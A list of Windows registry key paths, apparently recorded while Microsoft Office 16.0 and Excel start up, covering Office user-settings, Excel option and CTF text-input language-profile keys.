HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Intl
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Intl
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\MicrosoftDataStreamerforExcel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\MicrosoftDataStreamerforExcel\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Intl
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Graph_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Access_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Access_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Access_Core
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Migration\InstallationPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Maximized
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MonitorTopologyFingerprint
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Pos
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertForLargeOperations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefSheets
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ClassicEditingKeyboardMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PythonFormulaBarKeyboardingMatchesExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\InGridEditingMatchesFormulaBarEditing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OverrideCtrlF2Shortcut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertIfNotDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoDec
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MenuKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtX
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtY
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoChartFontScaling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SortCaseSensitive
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CustomSortOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MoveEnterDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FlashFill
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ExtendList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableNetworkResiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoHyperlink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoExpandListRange
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoCreateCalcCol
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Error Checking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Error Checking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublish
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublishWarning
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Xl9_Hijri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Jasper
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\WarnFuncConflict
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LivePreview
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SuppressDisplayAlerts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableParenFlash
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableBestFitMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EmbedUpdateRemoteReferences
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableMTP
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\MemoryLevelOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\System\CurrentControlSet\Control\GraphicsDrivers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\GraphicsDrivers
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP
HKEY_CURRENT_USER\Software\Policies\Microsoft\CTF
HKEY_CURRENT_USER\Software\Microsoft\CTF
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile\0x00000411
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile\0x00000411\{A76C93D9-5523-4E90-AAFA-4DB112F9AC76}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile\0x00000411\{A76C93D9-5523-4E90-AAFA-4DB112F9AC76}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile\0x00000404
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile\0x00000404\{4BDF9F03-C7D3-11D4-B2AB-0080C882687E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile\0x00000404\{6024B45F-5C54-11D4-B921-0080C882687E}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile\0x00000404\{6024B45F-5C54-11D4-B921-0080C882687E}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804\{82590C13-F4DD-44f4-BA1D-8667246FDF8E}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804\{82590C13-F4DD-44f4-BA1D-8667246FDF8E}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile\0x0000045e
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile\0x0000045e\{9A4E8FC7-76BF-4A63-980D-FADDADF7E987}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile\0x0000045e\{9A4E8FC7-76BF-4A63-980D-FADDADF7E987}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804\{FA550B04-5AD7-411f-A5AC-CA038EC515D7}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804\{FA550B04-5AD7-411f-A5AC-CA038EC515D7}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000439
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000439\{26FA8EBD-97DB-4F65-BF35-5E219EBD0079}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000439\{26FA8EBD-97DB-4F65-BF35-5E219EBD0079}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000445
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000445\{C7F2F349-36A2-4F2E-977B-5C18BAF1AE7D}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000445\{C7F2F349-36A2-4F2E-977B-5C18BAF1AE7D}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000446
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000446\{59139512-9763-4E5D-B8E5-0AC1C3BAE1AE}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000446\{59139512-9763-4E5D-B8E5-0AC1C3BAE1AE}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000447
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000447\{CDB41983-C911-4685-98CC-FC720BBF8FC8}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000447\{CDB41983-C911-4685-98CC-FC720BBF8FC8}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000448
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000448\{607EBD43-EA66-4CAC-A0B1-40F1D147364B}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000448\{607EBD43-EA66-4CAC-A0B1-40F1D147364B}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000449
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000449\{02E8FC61-6A42-4749-8124-68E28105C20E}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000449\{02E8FC61-6A42-4749-8124-68E28105C20E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000449\{045CBA61-4228-4F62-AC0C-F725470D7BFC}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000449\{045CBA61-4228-4F62-AC0C-F725470D7BFC}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044A
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044A\{9F0CDC2B-12B2-4776-A144-F79901A9F8DA}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044A\{9F0CDC2B-12B2-4776-A144-F79901A9F8DA}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044B
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044B\{0F420707-90F7-4E1B-B9F2-91FF3CA9D990}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044B\{0F420707-90F7-4E1B-B9F2-91FF3CA9D990}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044C
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044C\{6346F0DC-2FE4-40E6-99D5-7362723C3780}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044C\{6346F0DC-2FE4-40E6-99D5-7362723C3780}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044E
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044E\{DBEB227A-4EF6-45A6-85B5-B1A03D95BB66}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044E\{DBEB227A-4EF6-45A6-85B5-B1A03D95BB66}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000461
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000461\{7912A487-286C-4825-A608-F676C630B733}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000461\{7912A487-286C-4825-A608-F676C630B733}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000849
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000849\{02E8FC61-6A42-4749-8124-68E28105C20E}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000849\{02E8FC61-6A42-4749-8124-68E28105C20E}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff\{B37D4237-8D1A-412E-9026-538FE16DF216}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff\{B37D4237-8D1A-412E-9026-538FE16DF216}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile\0x00000412
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile\0x00000412\{B5FE1F02-D5F2-4445-9C03-C568F23C99A1}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile\0x00000412\{B5FE1F02-D5F2-4445-9C03-C568F23C99A1}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile\0x00000412
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile\0x00000412\{b60af051-257a-46bc-b9d3-84dad819bafb}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile\0x00000412\{b60af051-257a-46bc-b9d3-84dad819bafb}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile\0x00000404
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile\0x00000404\{B2F9C502-1742-11D4-9790-0080C882687E}
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile\0x00000404\{B2F9C502-1742-11D4-9790-0080C882687E}\Enable
